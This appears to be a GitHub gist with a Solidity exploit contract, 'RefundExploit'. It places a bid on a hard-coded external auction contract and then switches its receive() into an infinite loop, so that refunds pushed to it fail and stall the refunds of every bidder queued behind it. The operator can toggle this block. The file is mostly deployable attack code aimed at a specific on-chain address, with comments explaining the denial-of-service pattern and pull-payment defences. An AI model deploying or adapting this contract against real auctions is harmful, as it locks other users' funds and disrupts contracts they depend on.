@except
Created April 22, 2022 22:05
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.13;
/// @title RefundExploit
/// @notice Bidder contract whose ability to accept ether can be switched off
///         by its operator after it has placed a bid.
/// @dev Illustrates the "unpayable recipient" denial-of-service class. If the
///      target pushes refunds to bidders in sequence and requires every send
///      to succeed, one recipient that cannot be paid stalls every refund
///      queued behind it. NOTE(review): the target's refund code is not on
///      this page; confirm against the deployed contract.
///      Defensive takeaway for auction authors: credit refunds to a balance
///      that each bidder withdraws themselves (pull payments), or treat a
///      failed send as "still owed" and continue, instead of reverting the
///      whole batch. Refund recipients that are contracts with a
///      state-dependent receive() are worth flagging before a batch runs.
contract RefundExploit {
// When true, receive() never completes successfully. Set by bid() and
// toggled by setBlocked().
bool blocked;
/// @notice Forwards the attached ether as a bid to the external contract,
///         then arms the block.
/// @dev Callable only by the hard-coded address below.
///      NOTE(review): 0x…01 looks like a redacted placeholder for the
///      operator's address; confirm.
function bid() external payable {
require(msg.sender == 0x0000000000000000000000000000000000000001);
IAku aku = IAku(0xF42c318dbfBaab0EEE040279C6a2588Fa01a961d);
// The argument 1 is passed through as-is; its meaning is defined by the
// target, not visible here.
aku.bid{value: msg.value}(1);
// Armed only after the bid call returns, so ether sent to this contract
// during the call itself still takes the forwarding branch.
blocked = true;
}
/// @notice Handles plain ether transfers to this contract.
/// @dev Blocked: loops until the forwarded gas is exhausted, so the sender's
///      call fails. A gas cap on the sender side bounds the cost but the
///      transfer still fails, so the sender must tolerate the failure.
///      Not blocked: passes the received amount on to the hard-coded address
///      and reverts if that transfer fails.
receive() external payable {
if (blocked) {
while (true) {}
} else {
(bool success, ) = 0x0000000000000000000000000000000000000001.call{
value: msg.value
}("");
require(success);
}
}
/// @notice Sets or clears the block flag.
/// @dev Same hard-coded caller check as bid(). Because the flag can be
///      cleared, the stalled-refund condition is reversible by the operator.
/// @param _blocked New value for the flag.
function setBlocked(bool _blocked) external {
require(msg.sender == 0x0000000000000000000000000000000000000001);
blocked = _blocked;
}
}
/// @notice Minimal interface for the external contract that RefundExploit
///         sends its bid to.
/// @dev Declares only the one payable entry point this file calls; the
///      target's refund and withdrawal functions are not declared here.
interface IAku {
    /// @dev Accepts ether together with a uint8 argument. The argument's
    ///      meaning is defined by the target; the caller in this file
    ///      passes 1.
    function bid(uint8) external payable;
}

tea2x commented May 17, 2022

@jesusxy Thank you. I got it...I got misled by other analysis.
